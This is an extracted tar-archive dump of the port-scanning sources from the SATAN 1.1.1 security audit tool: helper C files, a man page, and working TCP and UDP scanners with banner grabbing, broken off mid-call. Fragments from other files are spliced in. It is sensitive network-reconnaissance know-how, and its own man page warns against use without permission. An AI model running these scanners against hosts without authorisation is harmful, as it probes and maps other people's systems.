= atoi(service)) != 0) { .return (htons(port)); } else { .if ((sp = getservbynasatan-1.1.1/src/port_scan/non_blocking.c............................................................ 600 . 465 . 506 . 752 5740245176 13254. ............................................................................... ................................................................................................................................................................................................................................................................. .................... /* * non_blocking - set/clear open file non-blocking I/O flag * * Environment: POSIX, 43BSD * * Author: Wietse Venema. */ #include <sys/types.h> #include <fcntl.h> /* Backwards compatibility */ #ifdef FNDELAY #define PATTERN.FNDELAY #else #define PATTERN.O_NONBLOCK #endif non_blocking(fd, on) int fd; int on; { int flags; if ((flags = fcntl(fd, F_GETFL, 0)) < 0) .return -1; return fcntl(fd, F_SETFL, on ? flags | PATTERN : flags & ~PATTERN); } r *ptr; int len;satan-1.1.1/src/port_scan/open_limit.c.............................................................. 600 . 465 . 506 . 743 5740245203 12740. ......................................................................................... ................................................................................................................................................................................................................................................................. .......... /* * open_limit - determine the current open file limit * * Environment: POSIX, 44BSD, 43BSD * * Author: Wietse Venema. */ #include <sys/types.h> #include <sys/time.h> #include <sys/resource.h> /* 44BSD compatibility. */ #ifdef RLIMIT_OFILE #define RLIMIT_NOFILE RLIMIT_OFILE #endif int open_limit() { #ifdef RLIMIT_NOFILE struct rlimit rl; getrlimit(RLIMIT_NOFILE, &rl); return (rl.rlim_cur); #else return (getdtablesize()); #endif } N); } r *ptr; int len;satan-1.1.1/src/port_scan/print_data.c.............................................................. 600 . 465 . 506 . 1114 5740245207 12743. ......................................................................................... ................................................................................................................................................................................................................................................................. .......... /* * print_data - print random data in printable form * * Author: Wietse Venema. */ #include <stdio.h> #include <ctype.h> #include "lib.h" void print_data(fp, buf, len) FILE *fp; char *buf; int len; { int c; while (len-- > 0) { .c = (*buf++ & 0377); .if (c == '\t') { . fputs("\\t", fp); .} else if (c == '\n') { . fputs("\\n", fp); .} else if (c == '\r') { . fputs("\\r", fp); .} else if (c == '\\') { . fputs("\\\\", fp); .} else if ((c & 0177) == c && isprint(c)) { . putc(c, fp); .} else { . fprintf(fp, "\\%03d", c); .} } } ; return (ptr); } /* dupstr - save string to heap */ char *dupstr(str) char *str; { return (strcpy(mymalloc(strlen(str) + 1), str)); } ddr); } /* find_port - translate numerical or symbolic service name */ int find_port(service, protocol) char *service; char *protocol; { struct servent *sp; int port; if ((port = atoi(service)) != 0) { .return (htons(port)); } else { .if ((sp = getservbynasatan-1.1.1/src/port_scan/ring.c.................................................................... 600 . 465 . 506 . 1725 5740245213 11562. ............................................................................... ................................................................................................................................................................................................................................................................. .................... /* * ring_init(), ring_append(), ring_prepend(), ring_detach(), ring_succ(), * ring_pred() - circular list management utilities. * * Author: Wietse Venema. */ #include "lib.h" /* ring_init - initialize ring head */ void ring_init(ring) RING *ring; { ring->pred = ring->succ = ring; } /* ring_append - insert entry after ring head */ void ring_append(ring, entry) RING *ring; RING *entry; { entry->succ = ring->succ; entry->pred = ring; ring->succ->pred = entry; ring->succ = entry; } /* ring_prepend - insert new entry before ring head */ void ring_prepend(ring, entry) RING *ring; RING *entry; { entry->pred = ring->pred; entry->succ = ring; ring->pred->succ = entry; ring->pred = entry; } /* ring_detach - remove entry from ring */ void ring_detach(entry) RING *entry; { register RING *succ = entry->succ; register RING *pred = entry->pred; pred->succ = succ; succ->pred = pred; } port)); } else { .if ((sp = getservbynasatan-1.1.1/src/port_scan/tcp_scan.1................................................................ 600 . 465 . 506 . 6234 5740245333 12336. ............................................................................... ................................................................................................................................................................................................................................................................. .....................TH TCP_SCAN 1 .SH NAME tcp_scan, udp_scan \- internet port scanners .SH SYNOPSIS .B tcp_scan [-abuU] [-l load] [-s string] [-w time] host service(s)... .sp .B udp_scan [-apuU] [-l load] host service(s)... .SH DESCRIPTION These commands take a list of internet services and investigate which services are available from a given host. The \fItcp_scan\fR command looks for connection-oriented services; \fIudp_scan\fR identifies active datagram ports. .sp Each \fIservice\fR argument may be specified as a symbolic name (telnet), a port number (23), an interval (1-1023, telnet-smtp) or an interval with the lower or upper bounds missing (the default bounds are 1 and 65535, respectively). .sp Options: .IP -a Report status of all specified services. .IP "-b (tcp_scan only)" Report banner information. Banners are converted to printable form using C-like escape sequences. Whenever \fItcp_scan\fR finds that the server does telnet options negotiation it sets the 't' flag in the output. This is useful to detect telnet servers on non-standard ports. .IP "-l load" Minimize the impact of network roundtrip delays by performing \fIload\fR network probes in parallel. The default load is the per-process open-file limit - 10. .IP "-p port (udp_scan only)" Use this port to verify that the host or network is alive. By default the UDP port scanner uses port number 1. Specify a port number that is known to be unreachable or inactive. .IP "-s string (tcp_scan only)" After a connection has been established, send .I string to the server. The following backslash escapes can be used: \\ooo (octal character code), \\b (backspace), \\f (formfeed), \\n (newline), \\r (carriage-return), \\s (space), and \\t (horizontal tab). The .I string should be enclosed between quotes if it contains shell meta characters. .IP "-t time (tcp_scan only)" Give up when the program has not found out anything within .I time seconds. This bounds the time lost when scanning systems with broken TCP/IP implementations that do not send RESETs when contacted at a dead port. The udp scanner already has a built-in mechanism to detect dead hosts. .IP -u Report probes that fail with "Host unreachable". Use this with packet filters that pass most traffic. .IP -U Report probes that do \fInot\fR fail with "Host unreachable". Use this with packet filters that block most traffic. .IP "-w time (tcp_scan only)" Wait for at most \fItime\fR seconds for banner information. .SH WARNING These programs will raise lots of alarms on sites that run the \fItcp wrapper\fR or other network logging software. Use only with prior permission. .SH BUGS The UDP port scanner relies on ICMP replies to detect that a service is unavailable, and may report false positives when the host or network dies in the middle of a measurement. .PP The TCP port scanner does not keep track of roundtrip times or of retransmissions, and may overload hosts or networks. .PP With some UNIX implementations, a single "Host unreachable" condition affects all connections that are being established with that host. .PP With some UNIX implementations, a single "Host unreachable" condition affects all TCP connections to that host, even those that already exist. .SH AUTHOR Wietse Venema SPROC_READ(readargs) = 6; ..void ..NFSPROC_WRITECACHE(void) = 7; ..attrstat ..NFSPROC_WRITE(writeargs) = 8; ..diropres ..NFSPROC_CREATE(createargs) = 9; ..nfsstat ..NFSPROC_REMOVE(diropargs) = 10; ..nfsstat ..NFSPROC_RENAME(renameargs) = 11; ..nfsstat ..NFSPROC_LINK(linkargs) = 12; ..nfsstat ..NFSPROC_SYMLINK(symlinkargs) = 13; ..diropres ..NFSPsatan-1.1.1/src/port_scan/tcp_scan.c................................................................ 600 . 465 . 506 . 33403 5740245224 12435. ............................................................................................... ................................................................................................................................................................................................................................................................. .... /* * tcp_scan - determine available tcp services, optionally collect banners * and detect telnet options * * Author: Wietse Venema. */ #include <sys/types.h> #include <sys/param.h> #include <sys/time.h> #include <sys/socket.h> #include <netinet/in.h> #include <netinet/in_systm.h> #include <netinet/ip.h> #include <netinet/ip_icmp.h> #include <netinet/tcp.h> #include <arpa/telnet.h> #include <stdio.h> #include <signal.h> #include <netdb.h> #include <string.h> #include <errno.h> extern int errno; extern char *optarg; extern int optind; #ifndef __STDC__ extern char *strerror(); #endif #define offsetof(t,m).(size_t)(&(((t *)0)->m)) #ifndef IPPORT_TELNET #define IPPORT_TELNET.23 #endif #ifndef FD_SET #include <sys/select.h> #endif #include "lib.h" #define BANNER_LENGTH.2048../* upper bound on banner info */ #define BANNER_TIME.10../* time for host to send banner */ #define BANNER_IDLE.1../* delay after last banner info */ #define YES 1 #define NO 0 #define WAIT.1 #define NOWAIT.0 int verbose;.../* default silent mode */ int banner_time = BANNER_TIME;./* banner timeout */ int open_file_limit;../* max nr of open files */ int load_limit;.../* max nr of open sockets */ struct timeval now;.../* banner_info last update time */ fd_set write_socket_mask;../* sockets with connect() in progress */ fd_set read_socket_mask;../* sockets with connect() finished */ int ports_busy;.../* number of open sockets */ int ports_done;.../* number of finished sockets */ int max_sock;.../* max socket file descriptor */ int want_err;.../* want good/bad news */ int show_all;.../* report all ports */ int *socket_to_port;.../* socket to port number */ typedef struct { unsigned char *buf;.../* banner information or null */ int count;.../* amount of banner received sofar */ int flags;.../* see below */ struct timeval connect_time;./* when connect() finished */ struct timeval read_time;../* time of last banner update */ } BANNER_INFO; BANNER_INFO *banner_info = 0; #define F_TELNET.(1<<0)../* telnet options seen */ int icmp_sock;.../* for unreachable reports */ static struct sockaddr_in sin;../* remote endpoint info */ static char *send_string;../* string to send */ int response_time;.../* need some response */ #define NEW(type, count) (type *) mymalloc((count) * sizeof(type)) #define time_since(t) (now.tv_sec - t.tv_sec + 1e-6 * (now.tv_usec - t.tv_usec)) /* main - command-line interface */ main(argc, argv) int argc; char *argv[]; { int c; struct protoent *pe; char **ports; progname = argv[0]; if (geteuid()) .error("This program needs root privileges"); open_file_limit = open_limit(); load_limit = open_file_limit - 10; while ((c = getopt(argc, argv, "abl:s:t:uUvw:")) != EOF) { .switch (c) { .case 'a': . show_all = 1; . break; .case 'b': . if (banner_info == 0) ..banner_info = NEW(BANNER_INFO, open_file_limit); . break; .case 'l': . if ((load_limit = atoi(optarg)) <= 0) ..usage("invalid load limit"); . if (load_limit > open_file_limit - 10) ..load_limit = open_file_limit - 10; . break; .case 's': . send_string = optarg; . signal(SIGPIPE, SIG_IGN); . break; .case 't': . if ((response_time = atoi(optarg)) <= 0) ..usage("invalid timeout"); . break; .case 'u': . want_err = EHOSTUNREACH; . break; .case 'U': . want_err = ~EHOSTUNREACH; . break; .case 'v': . verbose = 1; . break; .case 'w': . if ((banner_time = atoi(optarg)) <= 0) ..usage("invalid timeout"); . break; .default: . usage((char *) 0); . break; .} } argc -= (optind - 1); argv += (optind - 1); if (argc < 3) .usage("missing host or service argument"); socket_to_port = NEW(int, open_file_limit); FD_ZERO(&write_socket_mask); FD_ZERO(&read_socket_mask); ports_busy = 0; /* * Allocate the socket to read ICMP replies. */ if ((pe = getprotobyname("icmp")) == 0) .error("icmp: unknown protocol"); if ((icmp_sock = socket(AF_INET, SOCK_RAW, pe->p_proto)) < 0) .error("icmp socket: %m"); FD_SET(icmp_sock, &read_socket_mask); /* * Scan the ports. */ memset((char *) &sin, 0, sizeof(sin)); sin.sin_addr = find_addr(argv[1]); sin.sin_family = AF_INET; if (response_time > 0) .alarm(response_time); for (ports = argv + 2; *ports; ports++) .scan_ports(*ports); while (ports_busy > 0) .monitor_ports(WAIT); return (0); } /* usage - explain command syntax */ usage(why) char *why; { if (why) .remark(why); error("usage: %s [-abuU] [-l load] [-w time] host ports...", progname); } /* scan_ports - scan ranges of ports */ scan_ports(service) char *service; { char *cp; int min_port; int max_port; int port; int sock; /* * Translate service argument to range of port numbers. */ if ((cp = strchr(service, '-')) != 0) { .*cp++ = 0; .min_port = (service[0] ? ntohs(find_port(service, "tcp")) : 1); .max_port = (cp[0] ? ntohs(find_port(cp, "tcp")) : 65535); } else { .min_port = max_port = ntohs(find_port(service, "tcp")); } /* * Iterate over each port in the given range. Try to keep as many sockets * open at the same time as possible. Gradually increase the number of * probes so that they will be spread in time. */ for (port = min_port; port <= max_port; port++) { .if (verbose) . remark("connecting to port %d", port); .sin.sin_port = htons(port); .while ((sock = socket(sin.sin_family, SOCK_STREAM, 0)) < 0) { . remark("socket: %m"); . monitor_ports(WAIT); .} .add_socket(sock, port); .non_blocking(sock, YES); .if (connect(sock, (struct sockaddr *) & sin, sizeof(sin)) < 0 . && errno != EINPROGRESS) { . report_and_drop_socket(sock, errno); . continue; .} .if (ports_busy < load_limit && ports_busy < ports_done) { . monitor_ports(NOWAIT); .} else { . while (ports_busy >= load_limit || ports_busy >= ports_done) ..monitor_ports(WAIT); .} } } /* monitor_ports - watch for socket activity */ monitor_ports(wait) int wait; { fd_set read_mask; fd_set write_mask; static struct timeval waitsome = {1, 1,}; static struct timeval waitnot = {0, 0,}; int sock; char ch; if (banner_info == 0) { ./* . * When a connect() completes, report the socket and get rid of it. . */ .write_mask = write_socket_mask; .read_mask = read_socket_mask; .if (select(max_sock + 1, &read_mask, &write_mask, (fd_set *) 0, .. wait ? (struct timeval *) 0 : &waitnot) < 0) . error("select: %m"); .if (FD_ISSET(icmp_sock, &read_mask)) . receive_icmp(icmp_sock); .for (sock = 0; ports_busy > 0 && sock <= max_sock; sock++) { . if (FD_ISSET(sock, &write_mask)) { ..if (read(sock, &ch, 1) < 0 && errno != EWOULDBLOCK && errno != EAGAIN) { .. report_and_drop_socket(sock, errno); ..} else { .. report_and_drop_socket(sock, 0); ..} . } .} } else { ./* . * When a connect() completes, try to receive some data within . * banner_time seconds. Assume we have received all banner data when . * a socket stops sending for BANNER_IDLE seconds. . */ .write_mask = write_socket_mask; .read_mask = read_socket_mask; .if (select(max_sock + 1, &read_mask, &write_mask, (fd_set *) 0, .. wait ? &waitsome : &waitnot) < 0) . error("select: %m"); .if (FD_ISSET(icmp_sock, &read_mask)) . receive_icmp(icmp_sock); .gettimeofday(&now, (struct timezone *) 0); .for (sock = 0; ports_busy > 0 && sock <= max_sock; sock++) { . if (sock == icmp_sock) ..continue; . if (FD_ISSET(sock, &write_mask)) { ..FD_CLR(sock, &write_socket_mask); ..FD_SET(sock, &read_socket_mask); ..banner_info[sock].connect_time = now; ..if (send_string) .. do_send_string(sock); . } else if (FD_ISSET(sock, &read_mask)) { ..switch (read_socket(sock)) { ..case -1: .. if (errno != EWOULDBLOCK && errno != EAGAIN) ...report_and_drop_socket(sock, errno); .. break; ..case 0: .. report_and_drop_socket(sock, 0); .. break; ..} . } else if (FD_ISSET(sock, &read_socket_mask)) { ..if (time_since_connect(sock) > banner_time .. || time_since_read(sock) > BANNER_IDLE) .. report_and_drop_socket(sock, 0); . } .} } } /* read_socket - read data from server */ read_socket(sock) int sock; { BANNER_INFO *bp = banner_info + sock; unsigned char *cp; int len; int count; if (bp->buf == 0) .bp->buf = (unsigned char *) mymalloc(BANNER_LENGTH); cp = bp->buf + bp->count; len = BANNER_LENGTH - bp->count; if (len == 0) .return (0); bp->read_time = now; /* * Process banners with one-character reads so that we can detect telnet * options. */ if ((count = read(sock, cp, 1)) == 1) { .if (cp[0] == IAC) { . if ((count = read(sock, cp + 1, 2)) == 2) { ..if (cp[1] == WILL || cp[1] == WONT) { .. cp[1] = DONT; .. bp->flags |= F_TELNET; .. write(sock, cp, 3); ..} else if (cp[1] == DO || cp[1] == DONT) { .. cp[1] = WONT; .. bp->flags |= F_TELNET; .. write(sock, cp, 3); ..} . } .} else {..../* cp[0] != IAC */ . bp->count++; .} } return (count); } /* report_and_drop_socket - report what we know about this service */ report_and_drop_socket(sock, err) int sock; int err; { alarm(0); if (show_all || want_err == err || (want_err < 0 && want_err != ~err)) { .struct servent *sp; .int port = socket_to_port[sock]; .printf("%d:%s:", port, (sp = getservbyport(htons(port), "tcp")) != 0 ? . sp->s_name : "UNKNOWN"); .if (banner_info) { . BANNER_INFO *bp = banner_info + sock; . if (bp->flags & F_TELNET) ..putchar('t'); . putchar(':'); . if (bp->count > 0) ..print_data(stdout, bp->buf, bp->count); .} .if (err && show_all) . printf("%s", strerror(err)); .printf("\n"); .fflush(stdout); } drop_socket(sock); } /* add_socket - say this socket is being connected */ add_socket(sock, port) int sock; int port; { BANNER_INFO *bp; socket_to_port[sock] = port; if (banner_info) { .bp = banner_info + sock; .bp->count = 0; .bp->buf = 0; .bp->flags = 0; } FD_SET(sock, &write_socket_mask); if (sock > max_sock) .max_sock = sock; ports_busy++; } /* drop_socket - release socket resources */ drop_socket(sock) int sock; { BANNER_INFO *bp; if (banner_info && (bp = banner_info + sock)->buf) .free((char *) bp->buf); close(sock); FD_CLR(sock, &read_socket_mask); FD_CLR(sock, &write_socket_mask); ports_busy--; ports_done++; } /* time_since_read - how long since read() completed? */ time_since_read(sock) int sock; { BANNER_INFO *bp = banner_info + sock; return (bp->count == 0 ? 0 : time_since(bp->read_time)); } /* time_since_connect - how long since connect() completed? */ time_since_connect(sock) int sock; { BANNER_INFO *bp = banner_info + sock; return (time_since(bp->connect_time)); } /* receive_icmp - receive and decode ICMP message */ receive_icmp(sock) int sock; { union { .char chars[BUFSIZ]; .struct ip ip; } buf; int data_len; int hdr_len; struct ip *ip; struct icmp *icmp; struct tcphdr *tcp; int port; if ((data_len = recv(sock, (char *) &buf, sizeof(buf), 0)) < 0) { .error("error: recv: %m"); .return; } /* * Extract the IP header. */ ip = &buf.ip; if (ip->ip_p != IPPROTO_ICMP) { .error("error: not ICMP proto (%d)", ip->ip_p); .return; } /* * Extract the IP payload. */ hdr_len = ip->ip_hl << 2; if (data_len - hdr_len < ICMP_MINLEN) { .remark("short ICMP packet (%d bytes)", data_len); .return; } icmp = (struct icmp *) ((char *) ip + hdr_len); data_len -= hdr_len; if (icmp->icmp_type != ICMP_UNREACH) .return; /* * Extract the offending IP packet header. */ if (data_len < offsetof(struct icmp, icmp_ip) + sizeof(icmp->icmp_ip)) { .remark("short IP header in ICMP"); .return; } ip = &(icmp->icmp_ip); if (ip->ip_p != IPPROTO_TCP) .return; if (ip->ip_dst.s_addr != sin.sin_addr.s_addr) .return; /* * Extract the offending TCP packet header. */ hdr_len = ip->ip_hl << 2; tcp = (struct tcphdr *) ((char *) ip + hdr_len); data_len -= hdr_len; if (data_len < offsetof(struct tcphdr, th_dport) + sizeof(tcp->th_dport)) { .remark("short TCP header in ICMP"); .return; } /* * Process ICMP subcodes. */ switch (icmp->icmp_code) { case ICMP_UNREACH_NET: case ICMP_UNREACH_PROTOCOL: ./* error("error: network or protocol unreachable"); */ ./* NOTREACHED */ case ICMP_UNREACH_PORT: case ICMP_UNREACH_HOST: .port = ntohs(tcp->th_dport); .for (sock = 0; sock < open_file_limit; sock++) . if (socket_to_port[sock] == port) { ..report_and_drop_socket(sock, EHOSTUNREACH); ..return; . } .break; } } /* do_send_string - send the send string */ do_send_string(sock) int sock; { char buf[BUFSIZ]; char *cp = buf; char ch; int c; int i; char *s = send_string; while (*s && cp < buf + sizeof(buf) - 1) {./* don't overflow the buffer */ .if (*s != '\\') {.../* ordinary character */ . *cp++ = *s++; .} else if (isdigit(*++s) && *s < '8') {./* \nnn octal code */ . sscanf(s, "%3o", &c); . *cp++ = c; . for (i = 0; i < 3 && isdigit(*s) && *s < '8'; i++) ..s++; .} else if ((ch = *s++) == 0) {../* at string terminator */ . break; .} else if (ch == 'b') {.../* \b becomes backspace */ . *cp++ = '\b'; .} else if (ch == 'f') {.../* \f becomes formfeed */ . *cp++ = '\f'; .} else if (ch == 'n') {.../* \n becomes newline */ . *cp++ = '\n'; .} else if (ch == 'r') {.../* \r becomes carriage ret */ . *cp++ = '\r'; .} else if (ch == 's') {.../* \s becomes blank */ . *cp++ = ' '; .} else if (ch == 't') {.../* \t becomes tab */ . *cp++ = '\t'; .} else {..../* \any becomes any */ . *cp++ = ch; .} } write(sock, buf, cp - buf); } d_socket(sock, port) int sock; int port; { BANNER_INFO *bp; socket_to_port[sock] = port; if (banner_info) { .bp = banner_info + sock; .bp->count = 0; .bp->buf = 0; .bp->flags = 0; } FD_SET(sock, &write_socket_mask); if (satan-1.1.1/src/port_scan/udp_scan.c................................................................ 600 . 465 . 506 . 35627 5740245231 12447. ............................................................................................. ................................................................................................................................................................................................................................................................. ...... /* * udp-scan - determine available udp services * * Author: Wietse Venema. */ #include <sys/types.h> #include <sys/param.h> #include <sys/socket.h> #include <sys/time.h> #include <netinet/in_systm.h> #include <netinet/in.h> #include <netinet/ip.h> #include <netinet/ip_icmp.h> #include <netinet/udp.h> #include <errno.h> #include <netdb.h> #include <stdio.h> #include <string.h> extern int errno; #ifndef __STDC__ extern char *strerror(); #endif extern char *optarg; extern int optind; #define offsetof(t,m).(size_t)(&(((t *)0)->m)) #ifndef FD_SET #include <sys/select.h> #endif #include "lib.h" #define LOAD_LIMIT.100../* default max nr of open sockets */ #define AVG_MARGIN.10../* safety margin */ /* * In order to protect ourselves against dead hosts, we first probe UDP port * 1. If we do not get an ICMP error (no listener or host unreachable) we * assume this host is dead. If we do get an ICMP error, we have an estimate * of the roundtrip time. The test port can be changed with the -p option. */ char *test_port = "1"; int test_portno; #define YES 1 #define NO 0 int verbose = 0;.../* default silent mode */ int open_file_limit;../* max nr of open files */ /* * We attempt to send as many probes per roundtrip time as network capacity * permits. With UDP we must do our own retransmission and congestion * handling. */ int hard_limit = LOAD_LIMIT;./* max nr of open sockets */ int soft_limit;.../* slowly-moving load limit */ struct timeval now;.../* global time after select() */ int ports_busy;.../* number of open sockets */ int want_err = 0;.../* show reachable/unreachable */ int show_all = 0;.../* show all ports */ /* * Information about ongoing probes is sorted by time of last transmission. */ struct port_info { RING ring;.../* round-robin linkage */ struct timeval last_probe;../* time of last probe */ int port;.../* port number */ int pkts;.../* number of packets sent */ }; struct port_info *port_info = 0; RING active_ports;.../* active sockets list head */ RING dead_ports;.../* dead sockets list head */ struct port_info *find_port_info();./* retrieve port info */ /* * Performance statistics. These are used to update the transmission window * size depending on transmission error rates. */ double avg_irt = 0;.../* inter-reply arrival time */ double avg_rtt = 0;.../* round-trip time */ double avg_pkts = 1;.../* number of packets sent per reply */ int probes_sent = 0;../* probes sent */ int probes_done = 0;../* finished probes */ int replies;.../* number of good single probes */ struct timeval last_reply;../* time of last reply */ int send_sock;.../* send probes here */ int icmp_sock;.../* read replies here */ fd_set icmp_sock_mask;.../* select() read mask */ static struct sockaddr_in sin; /* * Helpers... */ #define time_since(t) (now.tv_sec - t.tv_sec + 1e-6 * (now.tv_usec - t.tv_usec)) #define sock_age(sp) time_since(sp->last_probe) double average(); struct port_info *add_port(); /* main - command-line interface */ main(argc, argv) int argc; char *argv[]; { int c; struct protoent *pe; char **ports; progname = argv[0]; if (geteuid()) .error("This program needs root privileges"); open_file_limit = open_limit(); while ((c = getopt(argc, argv, "al:p:uUv")) != EOF) { .switch (c) { .case 'a': . show_all = 1; . break; .case 'l': . if ((hard_limit = atoi(optarg)) <= 0) ..usage("invalid load limit"); . break; .case 'p': . test_port = optarg; . break; .case 'u': . want_err = EHOSTUNREACH; . break; .case 'U': . want_err = ~EHOSTUNREACH; . break; .case 'v': . verbose = 1; . break; .default: . usage((char *) 0); . break; .} } argc -= (optind - 1); argv += (optind - 1); if (argc < 3) .usage("missing argument"); if (hard_limit > open_file_limit - 10) .hard_limit = open_file_limit - 10; soft_limit = hard_limit + 1; init_port_info(); if ((pe = getprotobyname("icmp")) == 0) .error("icmp: unknown protocol"); if ((icmp_sock = socket(AF_INET, SOCK_RAW, pe->p_proto)) < 0) .error("icmp socket: %m"); FD_ZERO(&icmp_sock_mask); FD_SET(icmp_sock, &icmp_sock_mask); if ((send_sock = socket(AF_INET, SOCK_DGRAM, 0)) < 0) .error("socket: %m"); /* * First do a test probe to see if the host is up, and to establish the * round-trip time. This requires that the test port is not used. */ memset((char *) &sin, 0, sizeof(sin)); sin.sin_addr = find_addr(argv[1]); sin.sin_family = AF_INET; gettimeofday(&now, (struct timezone *) 0); last_reply = now; /* * Calibrate round-trip time and dead time. */ for (;;) { .scan_ports(test_port); .while (ports_busy > 0) . monitor_ports(); .if (avg_rtt) . break; .sleep(1); } scan_ports(test_port); /* * Scan those ports. */ for (ports = argv + 2; *ports; ports++) .scan_ports(*ports); /* * All ports probed, wait for replies to trickle back. */ while (ports_busy > 0) .monitor_ports(); return (0); } /* usage - explain command syntax */ usage(why) char *why; { if (why) .remark(why); error("usage: %s [-apuU] [-l load] host ports...", progname); } /* scan_ports - scan ranges of ports */ scan_ports(service) char *service; { char *cp; int min_port; int max_port; int port; struct port_info *sp; if (service == test_port) .test_portno = atoi(test_port); /* * Translate service argument to range of port numbers. */ if ((cp = strchr(service, '-')) != 0) { .*cp++ = 0; .min_port = (service[0] ? ntohs(find_port(service, "udp")) : 1); .max_port = (cp[0] ? ntohs(find_port(cp, "udp")) : 65535); } else { .min_port = max_port = ntohs(find_port(service, "udp")); } /* * Iterate over each port in the given range. Adjust the number of * simultaneous probes to the capacity of the network. */ for (port = min_port; port <= max_port; port++) { .sp = add_port(port); .write_port(sp); .monitor_ports(); } } /* monitor_ports - watch for socket activity */ monitor_ports() { do { .struct port_info *sp; ./* . * When things become quiet, examine the port that we haven't looked . * at for the longest period of time. . */ .receive_answers(); .if (ports_busy == 0) . return; .sp = (struct port_info *) ring_succ(&active_ports); .if (sp->pkts > avg_pkts * AVG_MARGIN) { . report_and_drop_port(sp, 0); .} else . /* . * Strategy depends on whether transit times dominate (probe . * multiple ports in parallel, retransmit when no reply was . * received for at least one round-trip period) or by dead time . * (probe one port at a time, retransmit when no reply was . * received for some fraction of the inter-reply period). . */ . if (sock_age(sp) > (avg_rtt == 0 ? 1 : ....2 * avg_rtt < avg_irt ? avg_irt / 4 : ....1.5 * avg_rtt)) { . write_port(sp); .} ./* . * When all ports being probed seem to be active, send a test probe . * to see if the host is still alive. . */ .if (time_since(last_reply) > 3 * (avg_rtt == 0 ? 1 : .... avg_rtt < avg_irt ? avg_irt : avg_rtt) . && find_port_info(test_portno) == 0) { . last_reply = now; . write_port(add_port(test_portno)); .} } while (ports_busy && (ports_busy >= hard_limit ... || ports_busy >= probes_done ... || ports_busy >= soft_limit)); } /* receive_answers - receive reactions to probes */ receive_answers() { fd_set read_mask; struct timeval waitsome; double delay; int answers; /* * The timeout is less than the inter-reply arrival time or we would not * be able to increase the load. */ delay = (2 * avg_rtt < avg_irt ? avg_irt / 3 : avg_rtt / (1 + ports_busy * 4)); waitsome.tv_sec = delay; waitsome.tv_usec = (delay - waitsome.tv_sec) * 1000000; read_mask = icmp_sock_mask; if ((answers = select(icmp_sock + 1, &read_mask, (fd_set *) 0, (fd_set *) 0, ... &waitsome)) < 0) .error("select: %m"); gettimeofday(&now, (struct timezone *) 0); /* * For each answer that we receive without retransmissions, update the * average roundtrip time. */ if (answers > 0) { .if (FD_ISSET(icmp_sock, &read_mask)) . receive_icmp(icmp_sock); } return (answers); } /* receive_icmp - receive and decode ICMP message */ receive_icmp(sock) int sock; { union { .char chars[BUFSIZ]; .struct ip ip; } buf; int data_len; int hdr_len; struct ip *ip; struct icmp *icmp; struct udphdr *udp; struct port_info *sp; if ((data_len = recv(sock, (char *) &buf, sizeof(buf), 0)) < 0) { .error("error: recv: %m"); .return; } /* * Extract the IP header. */ ip = &buf.ip; if (ip->ip_p != IPPROTO_ICMP) { .error("error: not ICMP proto (%d)", ip->ip_p); .return; } /* * Extract the IP payload. */ hdr_len = ip->ip_hl << 2; if (data_len - hdr_len < ICMP_MINLEN) { .remark("short ICMP packet (%d bytes)", data_len); .return; } icmp = (struct icmp *) ((char *) ip + hdr_len); data_len -= hdr_len; if (icmp->icmp_type != ICMP_UNREACH) .return; /* * Extract the offending IP header. */ if (data_len < offsetof(struct icmp, icmp_ip) + sizeof(icmp->icmp_ip)) { .remark("short IP header in ICMP"); .return; } ip = &(icmp->icmp_ip); if (ip->ip_p != IPPROTO_UDP) .return; if (ip->ip_dst.s_addr != sin.sin_addr.s_addr) .return; /* * Extract the offending UDP header. */ hdr_len = ip->ip_hl << 2; udp = (struct udphdr *) ((char *) ip + hdr_len); data_len -= hdr_len; if (data_len < sizeof(struct udphdr)) { .remark("short UDP header in ICMP"); .return; } /* * Process ICMP subcodes. */ switch (icmp->icmp_code) { case ICMP_UNREACH_NET: .error("error: network unreachable"); ./* NOTREACHED */ case ICMP_UNREACH_HOST: .if (sp = find_port_info(ntohs(udp->uh_dport))) . process_reply(sp, EHOSTUNREACH); .break; case ICMP_UNREACH_PROTOCOL: .error("error: protocol unreachable"); ./* NOTREACHED */ case ICMP_UNREACH_PORT: .if (sp = find_port_info(ntohs(udp->uh_dport))) . process_reply(sp, ECONNREFUSED); .break; } } /* process_reply - process reply */ process_reply(sp, err) struct port_info *sp; int err; { double age = sock_age(sp); int pkts = sp->pkts; double irt = time_since(last_reply); /* * Don't believe everything. */ if (age > 5) { .age = 5; } else if (age < 0) { .age = 1; } if (irt > 5) { .irt = 5; } else if (irt < 0) { .irt = 1; } /* * We jump some hoops for calibration purposes. First we estimate the * round-trip time: we use this to decide when to retransmit when network * transit time dominates. * * Next thing to do is to estimate the inter-reply time, in case the sender * has a "dead time" for ICMP replies; I have seen this happen with some * Cisco routers and with Solaris 2.4. The first reply will come fast; * subsequent probes will be ignored for a period of up to one second. * When this happens the retransmission period should be based on the * inter-reply time and not on the average round-trip time. */ last_reply = now; replies++; if (pkts == 1) .avg_rtt = (avg_rtt == 0 ? age :../* adopt initial rtt */ .. average(age, avg_rtt));./* normal processing */ avg_irt = (avg_irt == 0 ? 1 :../* prepare for irt ...... * calibration */ . avg_irt == 1 ? irt :../* adopt initial irt */ . average(irt, avg_irt));../* normal processing */ avg_pkts = average((double) pkts, avg_pkts); if (verbose) .printf("%d:age %.3f irt %.3f pkt %d ports %2d soft %2d done %2d avrtt %.3f avpkt %.3f avirt %.3f\n", . sp->port, age, irt, pkts, . ports_busy, soft_limit, . probes_done, avg_rtt, avg_pkts, avg_irt); report_and_drop_port(sp, err); } /* report_and_drop_port - report what we know about this service */ report_and_drop_port(sp, err) struct port_info *sp; int err; { struct servent *se; if (probes_done == 0) { .if (err == 0) . error("are we talking to a dead host or network?"); } else if (show_all || want_err == err || (want_err < 0 && want_err != ~err)) { .printf("%d:%s:", sp->port, . (se = getservbyport(htons(sp->port), "udp")) ? . se->s_name : "UNKNOWN"); .if (err && show_all) . printf("%s", strerror(err)); .printf("\n"); .fflush(stdout); } drop_port(sp); } /* average - quick-rise, slow-decay moving average */ double average(new, old) double new; double old; { if (new > old) {..../* quick rise */ .return ((new + old) / 2); } else {...../* slow decay */ .return (0.1 * new + 0.9 * old); } } /* add_port - say this port is being probed */ struct port_info *add_port(port) int port; { struct port_info *sp = (struct port_info *) ring_succ(&dead_ports); ring_detach((RING *) sp); sp->port = port; sp->pkts = 0; ports_busy++; ring_append(&active_ports, (RING *) sp); return (sp); } /* write_port - write to port, update statistics */ write_port(sp) struct port_info *sp; { char ch = 0; ring_detach((RING *) sp); sin.sin_port = htons(sp->port); sp->last_probe = now; sendto(send_sock, &ch, 1, 0, (struct sockaddr *) & sin, 